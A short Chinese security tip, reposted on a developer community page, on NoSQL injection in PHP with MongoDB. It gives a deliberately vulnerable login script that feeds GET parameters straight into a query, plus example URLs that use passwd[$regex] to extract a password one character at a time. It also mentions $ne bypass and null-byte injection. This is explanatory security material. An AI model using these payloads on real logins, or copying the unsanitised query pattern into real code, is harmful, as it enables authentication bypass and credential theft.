<?php
$con = new Mongo();
$db = $con->selectDB("demo")->selectCollection("admin");
var_dump($_GET['passwd']);
$ds =$db->find(array("username"=>$_GET['username'],"password"=>$_GET['passwd']));
foreach($ds as $k=>$v){
var_dump($v);
}
?>
http://localhost/mongo/go-1.php?username=heige&passwd[$regex]=^1
http://localhost/mongo/go-1.php?username=heige&passwd[$regex]=^2
测试的数据库结构:
> db.admin.find()
{ "_id" : ObjectId("4f562d110920d897e6765ae1"), "uid" : 1, "username" : "heige", "password" : "123456" }
{ "_id" : ObjectId("4f5b38ba0920d897e6765ae2"), "uid" : 2, "username" : "admin", "password" : "admin" }
这样的注射方式主要利用了PHP的特点,可以直接提交array 。。。
另外参考老外的2个tips:
http://www.idontplaydarts.com/2010/07/mongodb-is-vulnerable-to-sql-injection-in-php-at-least/ 直接用$ne 这个类似于常见的万用密码
http://www.idontplaydarts.com/2011/02/mongodb-null-byte-injection-attacks/ null字节注射
mongo+php 注射的一个tips from superhei
2012-07-18
1019
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《
阿里云开发者社区用户服务协议》和
《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写
侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介:
http://localhost/mongo/go-1.php?username=heige&passwd[$regex]=^1http://localhost/mongo/go-1.
目录
相关文章
|
PHP
php追加编译scws、mysqli和mongo、pgsql扩展模块
1400
0
0
|
Web App开发
关系型数据库
应用服务中间件
nginx+php+mysql+erlang+mongo环境安装
1365
0
0
|
NoSQL
PHP
Redis
|
Web App开发
关系型数据库
PHP
|
5月前
|
关系型数据库
MySQL
Linux
查看Linux、Apache、MySQL、PHP版本的技巧
以上就是查看Linux、Apache、MySQL、PHP版本信息的方法。希望这些信息能帮助你更好地理解和使用你的LAMP技术栈。
272
17
17
|
10月前
|
前端开发
关系型数据库
MySQL
PHP与MySQL动态网站开发实战指南####
【10月更文挑战第21天】
本文将深入浅出地探讨如何使用PHP与MySQL构建一个动态网站,从环境搭建到项目部署,全程实战演示。无论你是编程新手还是希望巩固Web开发技能的老手,都能在这篇文章中找到实用的技巧和启发。我们将一起探索如何通过PHP处理用户请求,利用MySQL存储数据,并最终呈现动态内容给用户,打造属于自己的在线平台。
####
397
0
0
|
6月前
|
关系型数据库
MySQL
PHP
源码编译安装LAMP(HTTP服务,MYSQL ,PHP,以及bbs论坛)
通过以上步骤,你可以成功地在一台Linux服务器上从源码编译并安装LAMP环境,并配置一个BBS论坛(Discuz!)。这些步骤涵盖了从安装依赖、下载源代码、配置编译到安装完成的所有细节。每个命令的解释确保了过程的透明度,使即使是非专业人士也能够理解整个流程。
133
18
18
|
7月前
|
关系型数据库
MySQL
网络安全
如何排查和解决PHP连接数据库MYSQL失败写锁的问题
通过本文的介绍,您可以系统地了解如何排查和解决PHP连接MySQL数据库失败及写锁问题。通过检查配置、确保服务启动、调整防火墙设置和用户权限,以及识别和解决长时间运行的事务和死锁问题,可以有效地保障应用的稳定运行。
308
25
25
|
10月前
|
安全
关系型数据库
MySQL
|
9月前
|
存储
关系型数据库
MySQL
PHP与MySQL动态网站开发:从基础到实践####
本文将深入探讨PHP与MySQL的结合使用,展示如何构建一个动态网站。通过一系列实例和代码片段,我们将逐步了解数据库连接、数据操作、用户输入处理及安全防护等关键技术点。无论您是初学者还是有经验的开发者,都能从中获益匪浅。
####
329
6
6
热门文章
最新文章
1
温故而知新,PHP Swoole使用过程中的一些思考
2
设计模式 -- 单例模式(Java&&PHP)
3
测试php中的curl是否可使用
4
《Android和PHP开发最佳实践》一第1章 学 前 必 读
5
PHP 多维数组 Key Value的使用
6
PHP输出Excel两种方法
7
windows server 2003 IIS下配置PHP
8
Introduction to php trojans
9
设计模式(一)简单工厂(创建型)(Java&&PHP)
10
ubuntu for win10 里运行apache+php
1
温故而知新,PHP Swoole使用过程中的一些思考
54
2
简单的php版本nacos客户端
64
3
专业打造一款圈子源码软件系统 / 后端 PHP 搭建部署一样实现利益化
143
4
采用PHP+Vue技术架构的不良事件管理系统(源码)
94
5
composer如何安装以及举例在PHP项目中使用Composer安装TCPDF库-优雅草卓伊凡
112
6
php项目源码加密之Zend Guard Loader加密的代码解密可能性很小-优雅草卓伊凡
96
7
深入理解 PHP 的 `unset()`:你真的释放内存了吗?
270
8
PHP 高效之道:字符串与数组处理的实用技巧
184
9
PHP中的陷阱:字符串与数字比较时,你真的安全吗?
60
10
PHP 的精髓:灵活高效,为 Web 而生
50